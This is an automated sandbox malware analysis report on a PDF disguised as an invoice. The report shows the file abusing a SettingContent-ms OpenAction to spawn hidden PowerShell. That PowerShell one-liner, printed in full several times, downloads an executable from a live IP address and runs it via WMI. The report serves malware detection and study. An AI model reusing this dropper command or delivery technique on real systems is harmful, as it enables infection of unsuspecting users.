
Analysis Report

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 618812
Start time: 11:19:24
Joe Sandbox Product: Cloud
Start date: 26.07.2018
Overall analysis duration: 0h 6m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: inovoice-019338.pdf
Cookbook file name: defaultwindowspdfcookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.evad.winPDF@12/13@0/2
EGA Information:
  • Successful, ratio: 100%
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 22
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .pdf
  • Found PDF document
  • Simulate clicks
  • Security Warning found
  • Click Allow
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, mscorsvw.exe, svchost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: scmwrap.exe, powershell.exe

Detection

Strategy  | Score | Range   | Reporting      | Detection
Threshold | 84    | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      |


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview



AV Detection:

Antivirus detection for submitted file
Source: inovoice-019338.pdf; Avira: Label: HTML/ExpKit.Gen
Multi AV Scanner detection for submitted file
Source: inovoice-019338.pdf; virustotal: Detection: 54%

Spreading:

Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Process created: C:\Windows\System32\scmwrap.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic; TCP traffic: 192.168.1.16:49188 -> 35.168.158.221:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic; TCP traffic: 192.168.1.16:49188 -> 35.168.158.221:443

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View; ASN Name: ZAPPIE-HOST-ASZappieHostGB ZAPPIE-HOST-ASZappieHostGB
Urls found in memory or binary data
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmp; String found in binary or memory: file:///
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/2z
Source: AcroRd32.exe, 00000005.00000003.10823562041.0493E000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0RA
Source: AcroRd32.exe, 00000005.00000002.10901176395.07781000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0Vector.
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0file://AcrobatMedia028800/c/0
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: file://AcrobatMedia028800/c/0xi
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: http://
Source: downl.SettingContent-ms.5.dr; String found in binary or memory: http://169.239.129.117/cal
Source: AcroRd32.exe, 00000005.00000003.10817535854.040BE000.00000004.sdmp; String found in binary or memory: http://RM
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://cipa.jp/exif/1.0/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://iptc.org/std/Iptc4xmpExt/2008-02-29/
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmp; String found in binary or memory: http://n
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://ns.useplus.org/ldf/xmp/1.0/
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmp; String found in binary or memory: http://recentfiles
Source: AcroRd32.exe, 00000003.00000002.10737080559.02BEB000.00000004.sdmp, UserCache.bin.5.dr; String found in binary or memory: http://recentfiles.
Source: AcroRd32.exe, 00000003.00000002.10737080559.02BEB000.00000004.sdmp, UserCache.bin.5.dr; String found in binary or memory: http://recentfiles.com.adobe.acrobat.extensions.files_description
Source: AcroRd32.exe, 00000005.00000002.10885203376.040C5000.00000004.sdmp; String found in binary or memory: http://w
Source: AcroRd32.exe, 00000005.00000002.10868648794.011ED000.00000004.sdmp, AcroRd32.exe, 00000005.00000002.10885309918.040EC000.00000004.sdmp; String found in binary or memory: http://ww
Source: AcroRd32.exe, 00000003.00000003.10718748997.02BD5000.00000004.sdmp; String found in binary or memory: http://www
Source: AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmp; String found in binary or memory: http://www.adob
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/extension/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/field#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/property#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/schema#
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfa/ns/type#
Source: AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: http://www.aiim.org/pdfe/ns/id/
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmp; String found in binary or memory: http://www.dictionary.com/cgi-bin/dict.pl?term=
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: http://www.macromedia.com
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: http://www.macromedia.comfile://AcrobatMedia028800/c/0file://AcrobatMedia028800
Source: AcroRd32.exe, 00000005.00000003.10789214811.0485D000.00000004.sdmp; String found in binary or memory: http://www.npes.org/pdfx/ns/id/
Source: AcroRd32.exe, 00000005.00000002.10891333143.04E2A000.00000004.sdmp; String found in binary or memory: http://www.quicktime.com.Acrobat
Source: AcroRd32.exe, 00000005.00000002.10885309918.040EC000.00000004.sdmp; String found in binary or memory: http://www.w3
Source: AcroRd32.exe, 00000005.00000003.10817535854.040BE000.00000004.sdmp; String found in binary or memory: http://www.w3.o
Source: AcroRd32.exe, 00000005.00000002.10886990853.04321000.00000004.sdmp, AcroRd32.exe, 00000005.00000003.10768979857.04344000.00000004.sdmp; String found in binary or memory: http://www.w3.or
Source: AcroRd32.exe, 00000003.00000003.10719111361.02B23000.00000004.sdmp, AcroRd32.exe, 00000003.00000003.10717756149.02B5F000.00000004.sdmp; String found in binary or memory: https://
Source: AcroRd32.exe, 00000005.00000003.10824445408.03A60000.00000004.sdmp; String found in binary or memory: https://idisk.mac.com/
Source: AcroRd32.exe, 00000005.00000003.10821737980.0406B000.00000004.sdmp; String found in binary or memory: https://www.acro
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/$
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/broadcastMessage
Source: AcroRd32.exe, 00000005.00000002.10891743459.06220000.00000004.sdmp; String found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/xehttps://www.macromedia.com/support/flashplayer/
Uses HTTPS
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown; Network traffic detected: HTTP traffic on port 49188 -> 443

System Summary:

Contains functionality to call native functions
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8110 NtSetInformationFile, 3_2_003D8110
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8210 NtOpenKey, 3_2_003D8210
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8310 NtCreateSection, 3_2_003D8310
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8000 NtCreateFile, 3_2_003D8000
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8050 NtOpenFile, 3_2_003D8050
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8250 NtOpenKeyEx, 3_2_003D8250
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8350 NtOpenSection, 3_2_003D8350
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8090 NtQueryAttributesFile, 3_2_003D8090
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D8690 NtMapViewOfSection, 3_2_003D8690
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D81D0 NtCreateKey, 3_2_003D81D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 3_2_003D82D0 NtCreateMutant, 3_2_003D82D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725050 NtOpenFile, 5_2_00725050
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725250 NtOpenKeyEx, 5_2_00725250
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725350 NtOpenSection, 5_2_00725350
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725110 NtSetInformationFile, 5_2_00725110
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725210 NtOpenKey, 5_2_00725210
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725310 NtCreateSection, 5_2_00725310
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725000 NtCreateFile, 5_2_00725000
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_007251D0 NtCreateKey, 5_2_007251D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_007252D0 NtCreateMutant, 5_2_007252D0
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725090 NtQueryAttributesFile, 5_2_00725090
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Code function: 5_2_00725690 NtMapViewOfSection, 5_2_00725690
.NET source code contains many API calls related to security
Source: 10.0.scmwrap.exe.860000.2.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.2.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.0.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.0.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.1.scmwrap.exe.860000.0.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.1.scmwrap.exe.860000.0.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.1.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.1.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.scmwrap.exe.860000.2.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.2.scmwrap.exe.860000.2.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.0.scmwrap.exe.860000.3.unpack, Program.cs; Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 10.0.scmwrap.exe.860000.3.unpack, Program.cs; Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Classification label
Source: classification engine; Classification label: mal84.expl.evad.winPDF@12/13@0/2
Creates files inside the user directory
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat
Creates temporary files
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp
Found command line output
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R.....$.....$.#........K\..........K\........k.r.....kH._yHn..............Da......Da....$.......d...R.`....r..........
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......#.....~uh...............a.~u..0.....\...L...@...<...................#.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........ ......./...A.t. .l.i.n.e.:.1. .c.h.a.r.:.3.5...L...@...d.................../.........7}........"...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`......./.....~uh...............a.~u..0.....\...L...@......................./.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R..... .......;...A.~u(...............a.~u..0.....\...L...@.......................;.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......;.....~uh...............a.~u..0.....\...L...@.......................;.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R..... .......G...A.~u(...............a.~u..0.....\...L...@.......................G.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......G.....~uh...............a.~u..0.....\...L...@.......................G.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R..... .......S...A.~u(...............a.~u..0.....\...L...@...-...................S.........7}......R.h...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......S.....~uh...............a.~u..0.....\...L...@...H...................S.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R..... ......._...A.~u(...............a.~u..0.....\...L...@...p..................._.........7}......R.................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`......._.....~uh...............a.~u..0.....\...L...@......................._.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........ .......k... . . .e.c.o.r.d.E.x.c.e.p.t.i.o.n...L...@.......................k.........7}........"...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......k.....~uh...............a.~u..0.....\...L...@.......................k.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ..R..... .......w...A.~u(...............a.~u..0.....\...L...@.......................w.........7}......R.Z...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.......w.....~uh...............a.~u..0.....\...L...@.......................w.......E.7}....P...................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........ ........... .~u(...............a.~u..0.....\...L...@...9.............................7}........................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ........`.............~uh...............a.~u..0.....\...L...@...T...........................E.7}....P...................
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\scmwrap.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Reads ini files
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: inovoice-019338.pdf; virustotal: Detection: 54%
Spawns processes
Source: unknown; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Source: unknown; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Source: unknown; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf'
Source: unknown; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'
Source: unknown; Process created: C:\Windows\System32\scmwrap.exe 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'
Source: unknown; Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Process created: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf'
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Process created: C:\Windows\System32\scmwrap.exe 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms'
Source: C:\Windows\System32\scmwrap.exe; Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{591209c7-767b-42b2-9fba-44ee4615f2c7}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder; Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Uses new MSVCR Dlls
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; File opened: C:\Windows\system32\MSVCR100.dll

Data Obfuscation:

PDF contains an OpenAction to launch a SettingContent-ms file
Source: inovoice-019338.pdf; Initial sample:
PDF has an OpenAction (likely to launch a dropper script)
Source: inovoice-019338.pdf; Initial sample: PDF keyword /OpenAction
Suspicious powershell command line found
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe; Process information set: NOOPENFILEERRORBOX
(this identical entry is listed 48 times in the report)
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
